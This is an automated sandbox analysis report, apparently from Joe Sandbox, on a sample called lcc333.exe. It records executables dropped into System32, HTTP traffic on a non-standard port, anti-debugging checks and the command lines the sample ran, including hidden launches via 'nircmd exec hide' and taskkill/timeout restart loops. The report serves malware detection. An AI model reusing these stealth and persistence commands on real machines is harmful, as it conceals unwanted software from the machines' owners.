                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Windows\System32\nircmd.exeJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Windows\System32\AutoDesk.exeJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeFile created: C:\Windows\System32\app_process.exeJump to dropped file

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Uses known network protocols on non-standard ports
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 48080
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 48080
                        Source: unknownNetwork traffic detected: HTTP traffic on port 48080 -> 49778
                        Source: unknownNetwork traffic detected: HTTP traffic on port 48080 -> 49779
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 48080
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 48080
                        Source: unknownNetwork traffic detected: HTTP traffic on port 48080 -> 49778
                        Source: unknownNetwork traffic detected: HTTP traffic on port 48080 -> 49779
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 48080
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 48080
                        Source: unknownNetwork traffic detected: HTTP traffic on port 48080 -> 50010
                        Source: unknownNetwork traffic detected: HTTP traffic on port 48080 -> 50011
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C876C0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF714C876C0
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\timeout.exeWindow / User API: threadDelayed 1089Jump to behavior
                        Source: C:\Windows\System32\timeout.exeWindow / User API: threadDelayed 5403Jump to behavior
                        Source: C:\Windows\System32\timeout.exeWindow / User API: threadDelayed 377Jump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6122\_ssl.pydJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6122\_decimal.pydJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6122\_queue.pydJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6122\select.pydJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6122\python312.dllJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6122\_lzma.pydJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6122\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6122\unicodedata.pydJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6122\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6122\_socket.pydJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6122\_hashlib.pydJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6122\_bz2.pydJump to dropped file
                        Source: C:\Users\user\Desktop\lcc333.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17721
                        Source: C:\Windows\System32\nircmd.exeAPI coverage: 0.0 %
                        Source: C:\Windows\System32\timeout.exe TID: 7136Thread sleep count: 39 > 30Jump to behavior
                        Source: C:\Windows\System32\timeout.exe TID: 3924Thread sleep count: 1089 > 30Jump to behavior
                        Source: C:\Windows\System32\timeout.exe TID: 3924Thread sleep time: -108900s >= -30000sJump to behavior
                        Source: C:\Windows\System32\timeout.exe TID: 2928Thread sleep count: 5403 > 30Jump to behavior
                        Source: C:\Windows\System32\timeout.exe TID: 2928Thread sleep time: -540300s >= -30000sJump to behavior
                        Source: C:\Windows\System32\timeout.exe TID: 2928Thread sleep count: 377 > 30Jump to behavior
                        Source: C:\Windows\System32\timeout.exe TID: 2928Thread sleep time: -37700s >= -30000sJump to behavior
                        Source: C:\Windows\System32\timeout.exe TID: 1568Thread sleep count: 127 > 30Jump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\timeout.exeLast function: Thread delayed
                        Source: C:\Windows\System32\timeout.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\timeout.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C89280 FindFirstFileExW,FindClose,0_2_00007FF714C89280
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C883C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF714C883C0
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714CA1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF714CA1874
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_0000000140002C80 strcpy,strrchr,FindFirstFileA,FindNextFileA,FindClose,15_2_0000000140002C80
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_0000000140003B64 FindFirstFileA,FindNextFileA,FindClose,strlen,strlen,15_2_0000000140003B64
                        Source: lcc333.exe, 00000000.00000003.2106645553.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp, cacert.pem.0.drBinary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
                        Source: app_process.exe, 00000012.00000002.3340588726.000001E127F7C000.00000004.00000020.00020000.00000000.sdmp, app_process.exe, 00000020.00000002.3354287204.0000014329934000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: cacert.pem.0.drBinary or memory string: zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd
                        Source: app_process.exe, 00000016.00000002.3340743307.000002168C8B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]]
                        Source: app_process.exe, 00000023.00000002.3354158380.00000275E82E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrr
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C9A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF714C9A614
                        Source: C:\Windows\System32\nircmd.exeCode function: 15_2_0000000140007DE4 FreeLibrary,LoadLibraryA,GetProcAddress,memset,GetLastError,FreeLibrary,memset,CreateProcessA,GetLastError,FreeLibrary,15_2_0000000140007DE4
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714CA3480 GetProcessHeap,0_2_00007FF714CA3480
                        Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C9A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF714C9A614
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C8C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF714C8C8A0
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C8D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF714C8D12C
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714C8D30C SetUnhandledExceptionFilter,0_2_00007FF714C8D30C
                        Source: C:\Windows\System32\app_process.exeMemory allocated: page read and write | page guardJump to behavior
                        Source: C:\Windows\System32\nircmd.exeCode function: memset,memset,GetWindowsDirectoryA,strlen,strlen,FindWindowA,GetWindowThreadProcessId,OpenProcess,CloseHandle,CloseHandle,PostMessageA,EnumWindows,memset,memset,MultiByteToWideChar,CloseHandle,FindWindowA,GetWindowThreadProcessId,PostMessageA,memset,CreateProcessA,FreeLibrary, Explorer.exe15_2_00000001400057E0
                        Source: C:\Windows\System32\nircmd.exeCode function: memset,memset,GetWindowsDirectoryA,strlen,strlen,FindWindowA,GetWindowThreadProcessId,OpenProcess,CloseHandle,CloseHandle,PostMessageA,EnumWindows,memset,memset,MultiByteToWideChar,CloseHandle,FindWindowA,GetWindowThreadProcessId,PostMessageA,memset,CreateProcessA,FreeLibrary, Explorer.exe15_2_00000001400057E0
                        Source: C:\Users\user\Desktop\lcc333.exeProcess created: C:\Users\user\Desktop\lcc333.exe "C:\Users\user\Desktop\lcc333.exe"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "AutoDesk.exe --pubkey BQQYZKHfNhmUrdU2UhwZzWdVpiVzdBCa3qLerhDrcbAs"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 120Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im AutoDesk.exeJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "AutoDesk.exe --pubkey BQQYZKHfNhmUrdU2UhwZzWdVpiVzdBCa3qLerhDrcbAs"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 120Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nircmd.exe nircmd exec hide "app_process.exe"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nircmd.exe nircmd exec hide "app_process.exe"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 600Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im app_process.exeJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nircmd.exe nircmd exec hide "app_process.exe"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nircmd.exe nircmd exec hide "app_process.exe"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 600Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\AutoDesk.exe AutoDesk.exe --pubkey BQQYZKHfNhmUrdU2UhwZzWdVpiVzdBCa3qLerhDrcbAsJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\AutoDesk.exe AutoDesk.exe --pubkey BQQYZKHfNhmUrdU2UhwZzWdVpiVzdBCa3qLerhDrcbAs
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im AutoDesk.exeJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im app_process.exeJump to behavior
                        Source: nircmd.exe, nircmd.exe, 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 0000000F.00000000.2523657662.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 00000015.00000002.2528526092.0000000140017000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: Shell_TrayWnd
                        Source: nircmd.exe, nircmd.exe, 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 0000000F.00000000.2523657662.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 00000015.00000002.2528526092.0000000140017000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: Progman
                        Source: nircmd.exe, nircmd.exe, 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 0000000F.00000000.2523657662.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 00000015.00000002.2528526092.0000000140017000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: progman
                        Source: nircmd.exe, 00000022.00000002.3347749954.0000000140017000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: "Userenv.dllCreateEnvironmentBlockCreateProcessWithLogonWExplorer.exeShell_TrayWndProgmanSetConsoleDisplayModeEnumDisplayDevicesAmasterwaveoutsynthcdmicrophonephoneauxlineheadphoneswaveinaltctrlshiftextplusspcentertabescinsdelDllRegisterServerDllUnregisterServerNirCmdWinClsfolder.loopcountcurrdate.currtime.sys.nir.param.fparam.clipboardNirComLinenowexefilesystemwindowsnircmdcommon_desktopcommon_start_menucommon_programsdesktopstart_menuprogramsstartupappdatalocalappdatacookiesfavoritesrecentcommon_startupcommon_favoritesprogramfilescommon_programfilesmydocumentsnormallowbelownormalabovenormalhighrealtimeSeTcbPrivilegeSeDebugPrivilegenohexnoasciibinCannot find the specified process !Failed to load the process library !leftshiftrightshiftleftctrlrightctrlleftmenurightmenudownupleftrighthomeendinsertdeletecommaminusperiodlwinrwinappspageuppagedownmultiplyaddsubtractseperatordividebackspacepausecapslocknumlockscrollprintscreen#32770clicksettextshowshownahidehideshowflashmaxminsettopmostfocusactivateenabledisabletoggledisabletogglehidetogglemintogglemaxredrawsetsizesendmsgpostmsgcenterchildmovedlgclickdlgsettextdlgsetfocus+style-style+exstyle-exstyletranstitlestitleititleetitleidclassprocessalltopalltopnodesktopprogmanshell_traywndbuttonallFailed to create the shortcut !nircmd.exe %sadmin$\nircmd.exe\\cfocusedsystemsoundsSound Devicesdefault_recordshowerrorparamsfilecmdwaitloopremotecopymultiremoteqboxcomqboxcomtopinfoboxqboxqboxtopexec2execexecmdcmd.execommand.com%s /c %sregsetvalThe specified key is not valid !SZEXPAND_SZDWORDBINARYregdelvalregdelkeyCannot delete the key, because it contains one or more subkeys.regeditinisetvalinidelvalinidelsecrasdialdlginetdialThe dialing function is not available in your system !rasdialUnable to receive dialup information of the specified entry !moverecyclebinemptybinrashangupFailed to hung up this RAS itemCannot find the specified connection name !exitwinlogoffpoweroffrebootshutdownforceforceifhungabortshutdowninitshutdowncmdshortcutcmdshortcutkeyshortcutshexecFailed to execute this file !clonefiletimesetfiletimesetfilefoldertimesetconsolemodeconsolewritesetconsolecolordebugwritesetcursorsetcursorwinrestartexplorersendkeypress+sendkeypresssendmousewheeldblclickmovecursorchangebrightness\\.\LCDsetbrightnesssetprimarydisplaysetdisplaymonitor:-updatereg-allusersFailed to change the display setting !Invalid display values !closeprocessFailed to close the specified process !killprocessFailed to kill the specified process !memdumpserviceUnable to load the services library !stopcontinuestartrestartautomanualdisabledbootwinhandleactiveforegroundlockwsclearsetfilereadfilewritefilewriteufileaddfileaddufilecopyimagesaveimageloadclpsaveclpsetdialuplogonFailed to set the logon details for this dialup item !scriptmediaplayopen "%s" type mpegvideo alias %splay %sclose %surlshortcut%fav%Failed to create the internet shortcut !monitoroffonasync_offasync_onasync_lowscreensaverscreensavertimeoutrunassystemwinlogon.exeruninteractiv
                        Source: nircmd.exe, nircmd.exe, 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 0000000F.00000000.2523657662.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 00000015.00000002.2528526092.0000000140017000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: shell_traywnd
                        Source: C:\Users\user\Desktop\lcc333.exeCode function: 0_2_00007FF714CA9570 cpuid 0_2_00007FF714CA9570
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\certifi VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122\_socket.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\Desktop\lcc333.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\lcc333.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI6122 VolumeInformationJump to behavior
